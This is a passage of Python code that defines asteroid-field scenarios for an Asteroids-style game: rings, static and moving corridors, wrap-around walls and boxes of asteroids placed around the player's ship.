asteroid_states=[{"position": (100, 0), "angle": 0.0, "speed": 60},
{"position": (200, 0), "angle": 0.0, "speed": 60},
{"position": (300, 0), "angle": 0.0, "speed": 60},
{"position": (400, 0), "angle": 0.0, "speed": 60},
{"position": (500, 0), "angle": 0.0, "speed": 60},
{"position": (600, 0), "angle": 0.0, "speed": 60},
{"position": (700, 0), "angle": 0.0, "speed": 60},
],
ship_state={"position": (400, 300)},
seed=0
)
# Ring scenarios ------------------------------------------------------------------------------------------------------#
# Scenario where a ring of asteroids closes in on the vehicle
# calculating initial states
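# The asteroids are spaced every 22.5 degrees on a circle of radius R centered on
# the ship at (400, 300); init_angle (in degrees) is chosen so that, under the
# game's angle convention, the asteroids close in on the ship at the center.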
R = 300
theta = np.linspace(0, 2 * np.pi, 17)[:-1]
ast_x = [R * np.cos(angle) + 400 for angle in theta]
ast_y = [R * np.sin(angle) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 30})
ring_closing = Scenario(
name="ring_closing",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring scenarios
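# The [1:-2] slice drops the first point and the last two of the full circle so
# the ring has an opening; the phase offset added inside cos/sin in each variant
# below rotates the ring so the opening ends up on the side the name refers to.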
# Static ring left
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
ast_x = [R * np.cos(angle + np.pi) + 400 for angle in theta]
ast_y = [R * np.sin(angle + np.pi) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_left = Scenario(
name="ring_static_left",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring right
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
ast_x = [R * np.cos(angle) + 400 for angle in theta]
ast_y = [R * np.sin(angle) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_right = Scenario(
name="ring_static_right",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring top
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
ast_x = [R * np.cos(angle + np.pi / 2) + 400 for angle in theta]
ast_y = [R * np.sin(angle + np.pi / 2) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_top = Scenario(
name="ring_static_top",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# Static ring bottom
R = 150
theta = np.linspace(0, 2 * np.pi, 17)[1:-2]
ast_x = [R * np.cos(angle + 3 * np.pi / 2) + 400 for angle in theta]
ast_y = [R * np.sin(angle + 3 * np.pi / 2) + 300 for angle in theta]
init_angle = [90 + val * 180 / np.pi for val in theta]
ast_states = []
for ii in range(len(init_angle)):
ast_states.append({"position": (ast_x[ii], ast_y[ii]), "angle": init_angle[ii], "speed": 0})
ring_static_bottom = Scenario(
name="ring_static_bottom",
asteroid_states=ast_states,
ship_state={"position": (400, 300)},
seed=0
)
# ---------------------------------------------------------------------------------------------------------------------#
# Normal corridor scenarios -------------------------------------------------------------------------------------------#
# Scenario where the ship is in a corridor and forced to shoot its way through
# calculating corridor states
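# The meshgrid fills the whole field with static asteroids except for a
# horizontal band between y = 200 and y = 400, which forms the corridor; the two
# extra "wall" asteroids appended below close off one end of it.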
num_x = 17
num_y = 10
x = np.linspace(0, 800, num_x)
y = np.concatenate((np.linspace(0, 200, int(num_y / 2)), np.linspace(400, 600, int(num_y / 2))))
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 0.0, "speed": 0})
# calculate wall asteroid states
ast_states.append({"position": (50, 266), "angle": -90.0, "speed": 0})
ast_states.append({"position": (50, 332), "angle": -90.0, "speed": 0})
corridor_left = Scenario(
name="corridor_left",
asteroid_states=ast_states,
ship_state={"position": (700, 300)},
seed=0
)
# calculate wall asteroid states
ast_states = ast_states[:-2]
ast_states.append({"position": (800, 266), "angle": 90.0, "speed": 20})
ast_states.append({"position": (800, 332), "angle": 90.0, "speed": 20})
corridor_right = Scenario(
name="corridor_right",
asteroid_states=ast_states,
ship_state={"position": (100, 300)},
seed=0
)
# Corridor top scenario
num_x = 14
num_y = 13
x = np.concatenate((np.linspace(0, 300, int(num_x / 2)), np.linspace(500, 800, int(num_x / 2))))
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 0.0, "speed": 0})
# calculate wall asteroid states
ast_states.append({"position": (366, 600), "angle": 180.0, "speed": 20})
ast_states.append({"position": (432, 600), "angle": 180.0, "speed": 20})
corridor_top = Scenario(
name="corridor_top",
asteroid_states=ast_states,
ship_state={"position": (400, 100)},
seed=0
)
# Corridor bottom scenario
# calculate wall asteroid states
ast_states = ast_states[:-2]
ast_states.append({"position": (366, 0), "angle": 0.0, "speed": 20})
ast_states.append({"position": (432, 0), "angle": 0.0, "speed": 20})
corridor_bottom = Scenario(
name="corridor_bottom",
asteroid_states=ast_states,
ship_state={"position": (400, 500)},
seed=0
)
# ---------------------------------------------------------------------------------------------------------------------#
# Moving Corridor Scenarios -------------------------------------------------------------------------------------------#
# Corridor moving right
# calculating corridor states
num_x = 17
num_y = 10
x = np.linspace(0, 800, num_x)
y = np.concatenate((np.linspace(0, 200, int(num_y / 2)), np.linspace(400, 600, int(num_y / 2))))
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 120})
moving_corridor_1 = Scenario(
name="moving_corridor_1",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": 90},
seed=0
)
# Corridor moving left
# calculating corridor states
num_x = 17
num_y = 10
x = np.linspace(0, 800, num_x)
y = np.concatenate((np.linspace(0, 200, int(num_y / 2)), np.linspace(400, 600, int(num_y / 2))))
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 90.0, "speed": 120})
moving_corridor_2 = Scenario(
name="moving_corridor_2",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": -90},
seed=0
)
# Corridor moving down
# calculating corridor states
num_x = 14
num_y = 13
x = np.concatenate((np.linspace(0, 300, int(num_x / 2)), np.linspace(500, 800, int(num_x / 2))))
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 180.0, "speed": 120})
moving_corridor_3 = Scenario(
name="moving_corridor_3",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": 0},
seed=0
)
# Corridor moving up
# calculating corridor states
num_x = 14
num_y = 13
x = np.concatenate((np.linspace(0, 300, int(num_x / 2)), np.linspace(500, 800, int(num_x / 2))))
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": 0.0, "speed": 120})
moving_corridor_4 = Scenario(
name="moving_corridor_4",
asteroid_states=ast_states,
ship_state={"position": (400, 300), "angle": 180},
seed=0
)
# Angled corridor scenario 1
# calculating corridor states
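# Asteroids are kept only where they are more than 160 units (vertically) from
# both of the lines y = 1.5*x and y = -1.5*x + 1200, carving two diagonal
# corridors that meet near the top center of the field.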
num_x = 17
num_y = 13
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs(1.5 * ast_x[ii, jj] - ast_y[ii, jj]) <= 160) and not (
abs(-1.5 * ast_x[ii, jj] + 1200 - ast_y[ii, jj]) <= 160):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 30})
moving_corridor_angled_1 = Scenario(
name="moving_corridor_angled_1",
asteroid_states=ast_states,
ship_state={"position": (750, 50), "angle": 90},
seed=0
)
# Angled corridor scenario 2
# calculating corridor states
num_x = 17
num_y = 13
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs(-1.5 * ast_x[ii, jj] + 600 - ast_y[ii, jj]) <= 160) and not (
abs(1.5 * ast_x[ii, jj] - 600 - ast_y[ii, jj]) <= 160):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 30})
moving_corridor_angled_2 = Scenario(
name="moving_corridor_angled_2",
asteroid_states=ast_states,
ship_state={"position": (750, 550), "angle": 90},
seed=0
)
# Curved corridor scenario 1
# calculating corridor states
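# Asteroids are removed within 200 units (vertically) of the downward-opening
# parabola y = 600 - (x - 400)**2 / 300, leaving a curved corridor that arches
# over the field.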
num_x = 17
num_y = 13
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs(-(1 / 300) * (ast_x[ii, jj] - 400) ** 2 + 600 - ast_y[ii, jj]) <= 200):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 30})
moving_corridor_curve_1 = Scenario(
name="moving_corridor_curve_1",
asteroid_states=ast_states,
ship_state={"position": (550, 500), "angle": 90},
seed=0
)
# Curved corridor scenario 2
# calculating corridor states
num_x = 30
num_y = 45
x = np.linspace(0, 800, num_x)
y = np.linspace(0, 600, num_y)
ast_x, ast_y = np.meshgrid(x, y, sparse=False, indexing='ij')
ast_states = []
for ii in range(num_x):
for jj in range(num_y):
if not (abs((1 / 300) * (ast_x[ii, jj] - 400) ** 2 - ast_y[ii, jj]) <= 200) and not (
abs((1 / 300) * (ast_x[ii, jj] - 400) ** 2 - ast_y[ii, jj]) >= 300):
ast_states.append({"position": (ast_x[ii, jj], ast_y[ii, jj]), "angle": -90.0, "speed": 120, "size": 1})
moving_corridor_curve_2 = Scenario(
name="moving_corridor_curve_2",
asteroid_states=ast_states,
ship_state={"position": (550, 100), "angle": 90},
seed=0
)
# ---------------------------------------------------------------------------------------------------------------------#
# Apocalypse scenarios-------------------------------------------------------------------------------------------------#
# Scenario meant to be difficult; it probably can't be totally cleared.
# Currently the vehicle spawns on top of asteroids; the overlap won't kill it until you fire.
scenario_apocalypse_1 = Scenario(name="apocalypse_1", num_asteroids=50, seed=1)
# ---------------------------------------------------------------------------------------------------------------------#
# Forcing wrap scenarios-----------------------------------------------------------------------------------------------#
# Wrap right scenarios
wall_right_wrap_1 = Scenario(
name="wall_right_wrap_1",
asteroid_states=[{"position": (600, 0), "angle": -90.0, "speed": 80},
{"position": (600, 100), "angle": -90.0, "speed": 80},
{"position": (600, 200), "angle": -90.0, "speed": 80},
{"position": (600, 300), "angle": -90.0, "speed": 80},
{"position": (600, 400), "angle": -90.0, "speed": 80},
{"position": (600, 500), "angle": -90.0, "speed": 80},
{"position": (600, 600), "angle": -90.0, "speed": 80},
],
ship_state={"position": (750, 300)},
seed=0
)
wall_right_wrap_2 = Scenario(
name="wall_right_wrap_2",
asteroid_states=[{"position": (750, 0), "angle": -90.0, "speed": 80},
{"position": (750, 100), "angle": -90.0, "speed": 80},
{"position": (750, 200), "angle": -90.0, "speed": 80},
{"position": (750, 300), "angle": -90.0, "speed": 80},
{"position": (750, 400), "angle": -90.0, "speed": 80},
{"position": (750, 500), "angle": -90.0, "speed": 80},
{"position": (750, 600), "angle": -90.0, "speed": 80},
],
ship_state={"position": (50, 300)},
seed=0
)
wall_right_wrap_3 = Scenario(
name="wall_right_wrap_3",
asteroid_states=[{"position": (600, 0), "angle": -90.0, "speed": 80},
{"position": (600, 100), "angle": -90.0, "speed": 80},
{"position": (600, 200), "angle": -90.0, "speed": 80},
{"position": (600, 300), "angle": -90.0, "speed": 80},
{"position": (600, 400), "angle": -90.0, "speed": 80},
{"position": (600, 500), "angle": -90.0, "speed": 80},
{"position": (600, 600), "angle": -90.0, "speed": 80},
{"position": (200, 0), "angle": -90.0, "speed": 0},
{"position": (200, 100), "angle": -90.0, "speed": 0},
{"position": (200, 200), "angle": -90.0, "speed": 0},
{"position": (200, 300), "angle": -90.0, "speed": 0},
{"position": (200, 400), "angle": -90.0, "speed": 0},
{"position": (200, 500), "angle": -90.0, "speed": 0},
{"position": (200, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (750, 300)},
seed=0
)
wall_right_wrap_4 = Scenario(
name="wall_right_wrap_4",
asteroid_states=[{"position": (750, 0), "angle": -90.0, "speed": 80},
{"position": (750, 100), "angle": -90.0, "speed": 80},
{"position": (750, 200), "angle": -90.0, "speed": 80},
{"position": (750, 300), "angle": -90.0, "speed": 80},
{"position": (750, 400), "angle": -90.0, "speed": 80},
{"position": (750, 500), "angle": -90.0, "speed": 80},
{"position": (750, 600), "angle": -90.0, "speed": 80},
{"position": (200, 0), "angle": -90.0, "speed": 0},
{"position": (200, 100), "angle": -90.0, "speed": 0},
{"position": (200, 200), "angle": -90.0, "speed": 0},
{"position": (200, 300), "angle": -90.0, "speed": 0},
{"position": (200, 400), "angle": -90.0, "speed": 0},
{"position": (200, 500), "angle": -90.0, "speed": 0},
{"position": (200, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (50, 300)},
seed=0
)
# Wrap left scenarios
wall_left_wrap_1 = Scenario(
name="wall_left_wrap_1",
asteroid_states=[{"position": (200, 0), "angle": 90.0, "speed": 80},
{"position": (200, 100), "angle": 90.0, "speed": 80},
{"position": (200, 200), "angle": 90.0, "speed": 80},
{"position": (200, 300), "angle": 90.0, "speed": 80},
{"position": (200, 400), "angle": 90.0, "speed": 80},
{"position": (200, 500), "angle": 90.0, "speed": 80},
{"position": (200, 600), "angle": 90.0, "speed": 80},
],
ship_state={"position": (50, 300)},
seed=0
)
wall_left_wrap_2 = Scenario(
name="wall_left_wrap_2",
asteroid_states=[{"position": (50, 0), "angle": 90.0, "speed": 80},
{"position": (50, 100), "angle": 90.0, "speed": 80},
{"position": (50, 200), "angle": 90.0, "speed": 80},
{"position": (50, 300), "angle": 90.0, "speed": 80},
{"position": (50, 400), "angle": 90.0, "speed": 80},
{"position": (50, 500), "angle": 90.0, "speed": 80},
{"position": (50, 600), "angle": 90.0, "speed": 80},
],
ship_state={"position": (750, 300)},
seed=0
)
wall_left_wrap_3 = Scenario(
name="wall_left_wrap_3",
asteroid_states=[{"position": (200, 0), "angle": 90.0, "speed": 80},
{"position": (200, 100), "angle": 90.0, "speed": 80},
{"position": (200, 200), "angle": 90.0, "speed": 80},
{"position": (200, 300), "angle": 90.0, "speed": 80},
{"position": (200, 400), "angle": 90.0, "speed": 80},
{"position": (200, 500), "angle": 90.0, "speed": 80},
{"position": (200, 600), "angle": 90.0, "speed": 80},
{"position": (600, 0), "angle": -90.0, "speed": 0},
{"position": (600, 100), "angle": -90.0, "speed": 0},
{"position": (600, 200), "angle": -90.0, "speed": 0},
{"position": (600, 300), "angle": -90.0, "speed": 0},
{"position": (600, 400), "angle": -90.0, "speed": 0},
{"position": (600, 500), "angle": -90.0, "speed": 0},
{"position": (600, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (50, 300)},
seed=0
)
wall_left_wrap_4 = Scenario(
name="wall_left_wrap_4",
asteroid_states=[{"position": (50, 0), "angle": 90.0, "speed": 80},
{"position": (50, 100), "angle": 90.0, "speed": 80},
{"position": (50, 200), "angle": 90.0, "speed": 80},
{"position": (50, 300), "angle": 90.0, "speed": 80},
{"position": (50, 400), "angle": 90.0, "speed": 80},
{"position": (50, 500), "angle": 90.0, "speed": 80},
{"position": (50, 600), "angle": 90.0, "speed": 80},
{"position": (600, 0), "angle": -90.0, "speed": 0},
{"position": (600, 100), "angle": -90.0, "speed": 0},
{"position": (600, 200), "angle": -90.0, "speed": 0},
{"position": (600, 300), "angle": -90.0, "speed": 0},
{"position": (600, 400), "angle": -90.0, "speed": 0},
{"position": (600, 500), "angle": -90.0, "speed": 0},
{"position": (600, 600), "angle": -90.0, "speed": 0},
],
ship_state={"position": (750, 300)},
seed=0
)
# Wrap top scenarios
wall_top_wrap_1 = Scenario(
name="wall_top_wrap_1",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
],
ship_state={"position": (400, 550)},
seed=0
)
wall_top_wrap_2 = Scenario(
name="wall_top_wrap_2",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
],
ship_state={"position": (400, 50)},
seed=0
)
wall_top_wrap_3 = Scenario(
name="wall_top_wrap_3",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
{"position": (0, 200), "angle": 0.0, "speed": 0},
{"position": (100, 200), "angle": 0.0, "speed": 0},
{"position": (200, 200), "angle": 0.0, "speed": 0},
{"position": (300, 200), "angle": 0.0, "speed": 0},
{"position": (400, 200), "angle": 0.0, "speed": 0},
{"position": (500, 200), "angle": 0.0, "speed": 0},
{"position": (600, 200), "angle": 0.0, "speed": 0},
{"position": (700, 200), "angle": 0.0, "speed": 0},
{"position": (800, 200), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 550)},
seed=0
)
wall_top_wrap_4 = Scenario(
name="wall_top_wrap_4",
asteroid_states=[{"position": (0, 400), "angle": 0.0, "speed": 80},
{"position": (100, 400), "angle": 0.0, "speed": 80},
{"position": (200, 400), "angle": 0.0, "speed": 80},
{"position": (300, 400), "angle": 0.0, "speed": 80},
{"position": (400, 400), "angle": 0.0, "speed": 80},
{"position": (500, 400), "angle": 0.0, "speed": 80},
{"position": (600, 400), "angle": 0.0, "speed": 80},
{"position": (700, 400), "angle": 0.0, "speed": 80},
{"position": (800, 400), "angle": 0.0, "speed": 80},
{"position": (0, 200), "angle": 0.0, "speed": 0},
{"position": (100, 200), "angle": 0.0, "speed": 0},
{"position": (200, 200), "angle": 0.0, "speed": 0},
{"position": (300, 200), "angle": 0.0, "speed": 0},
{"position": (400, 200), "angle": 0.0, "speed": 0},
{"position": (500, 200), "angle": 0.0, "speed": 0},
{"position": (600, 200), "angle": 0.0, "speed": 0},
{"position": (700, 200), "angle": 0.0, "speed": 0},
{"position": (800, 200), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 50)},
seed=0
)
# Wrap bottom scenarios
wall_bottom_wrap_1 = Scenario(
name="wall_bottom_wrap_1",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
],
ship_state={"position": (400, 50)},
seed=0
)
wall_bottom_wrap_2 = Scenario(
name="wall_bottom_wrap_2",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
],
ship_state={"position": (400, 550)},
seed=0
)
wall_bottom_wrap_3 = Scenario(
name="wall_bottom_wrap_3",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
{"position": (0, 400), "angle": 0.0, "speed": 0},
{"position": (100, 400), "angle": 0.0, "speed": 0},
{"position": (200, 400), "angle": 0.0, "speed": 0},
{"position": (300, 400), "angle": 0.0, "speed": 0},
{"position": (400, 400), "angle": 0.0, "speed": 0},
{"position": (500, 400), "angle": 0.0, "speed": 0},
{"position": (600, 400), "angle": 0.0, "speed": 0},
{"position": (700, 400), "angle": 0.0, "speed": 0},
{"position": (800, 400), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 50)},
seed=0
)
wall_bottom_wrap_4 = Scenario(
name="wall_bottom_wrap_4",
asteroid_states=[{"position": (0, 200), "angle": 180.0, "speed": 80},
{"position": (100, 200), "angle": 180.0, "speed": 80},
{"position": (200, 200), "angle": 180.0, "speed": 80},
{"position": (300, 200), "angle": 180.0, "speed": 80},
{"position": (400, 200), "angle": 180.0, "speed": 80},
{"position": (500, 200), "angle": 180.0, "speed": 80},
{"position": (600, 200), "angle": 180.0, "speed": 80},
{"position": (700, 200), "angle": 180.0, "speed": 80},
{"position": (800, 200), "angle": 180.0, "speed": 80},
{"position": (0, 400), "angle": 0.0, "speed": 0},
{"position": (100, 400), "angle": 0.0, "speed": 0},
{"position": (200, 400), "angle": 0.0, "speed": 0},
{"position": (300, 400), "angle": 0.0, "speed": 0},
{"position": (400, 400), "angle": 0.0, "speed": 0},
{"position": (500, 400), "angle": 0.0, "speed": 0},
{"position": (600, 400), "angle": 0.0, "speed": 0},
{"position": (700, 400), "angle": 0.0, "speed": 0},
{"position": (800, 400), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 550)},
seed=0
)
# A scenario with a big non-moving box
scenario_big_box = Scenario(
name="big_box",
asteroid_states=[{"position": (100, 600), "angle": 0.0, "speed": 0},
{"position": (200, 600), "angle": 0.0, "speed": 0},
{"position": (300, 600), "angle": 0.0, "speed": 0},
{"position": (400, 600), "angle": 0.0, "speed": 0},
{"position": (500, 600), "angle": 0.0, "speed": 0},
{"position": (600, 600), "angle": 0.0, "speed": 0},
{"position": (700, 600), "angle": 0.0, "speed": 0},
{"position": (100, 0), "angle": 0.0, "speed": 0},
{"position": (200, 0), "angle": 0.0, "speed": 0},
{"position": (300, 0), "angle": 0.0, "speed": 0},
{"position": (400, 0), "angle": 0.0, "speed": 0},
{"position": (500, 0), "angle": 0.0, "speed": 0},
{"position": (600, 0), "angle": 0.0, "speed": 0},
{"position": (700, 0), "angle": 0.0, "speed": 0},
{"position": (800, 0), "angle": 0.0, "speed": 0},
{"position": (0, 0), "angle": 0.0, "speed": 0},
{"position": (0, 100), "angle": 0.0, "speed": 0},
{"position": (0, 200), "angle": 0.0, "speed": 0},
{"position": (0, 300), "angle": 0.0, "speed": 0},
{"position": (0, 400), "angle": 0.0, "speed": 0},
{"position": (0, 500), "angle": 0.0, "speed": 0},
{"position": (0, 600), "angle": 0.0, "speed": 0},
{"position": (800, 100), "angle": 0.0, "speed": 0},
{"position": (800, 200), "angle": 0.0, "speed": 0},
{"position": (800, 300), "angle": 0.0, "speed": 0},
{"position": (800, 400), "angle": 0.0, "speed": 0},
{"position": (800, 500), "angle": 0.0, "speed": 0},
{"position": (800, 600), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 300)},
seed=0
)
# A scenario with a little non-moving box
scenario_small_box = Scenario(
name="small_box",
asteroid_states=[{"position": (200, 500), "angle": 0.0, "speed": 0},
{"position": (300, 500), "angle": 0.0, "speed": 0},
{"position": (400, 500), "angle": 0.0, "speed": 0},
{"position": (500, 500), "angle": 0.0, "speed": 0},
{"position": (200, 100), "angle": 0.0, "speed": 0},
{"position": (300, 100), "angle": 0.0, "speed": 0},
{"position": (400, 100), "angle": 0.0, "speed": 0},
{"position": (500, 100), "angle": 0.0, "speed": 0},
{"position": (600, 100), "angle": 0.0, "speed": 0},
{"position": (200, 200), "angle": 0.0, "speed": 0},
{"position": (200, 300), "angle": 0.0, "speed": 0},
{"position": (200, 400), "angle": 0.0, "speed": 0},
{"position": (600, 200), "angle": 0.0, "speed": 0},
{"position": (600, 300), "angle": 0.0, "speed": 0},
{"position": (600, 400), "angle": 0.0, "speed": 0},
{"position": (600, 500), "angle": 0.0, "speed": 0},
],
ship_state={"position": (400, 300)},
seed=0
)
# A scenario with two still (non-moving) corridors that cross at the center of the map
scenario_2_still_corridors = Scenario(
name="scenario_2_still_corridors",
asteroid_states=[{"position": (0, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (50, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (100, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (150, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (200, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (250, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (300, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (0, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (50, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (100, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (150, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (200, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (250, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (300, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (500, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (550, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (600, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (650, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (700, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (750, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (800, 250), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (500, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (550, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (600, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (650, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (700, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (750, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (800, 350), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 0), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 50), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 100), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 150), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 200), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 0), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 50), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 100), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 150), "angle": 0.0, "speed": 0, "size": 2},
{"position": (450, 200), "angle": 0.0, "speed": 0, "size": 2},
{"position": (350, 350), "angle": 0.0, "speed": 0, "size": 2},
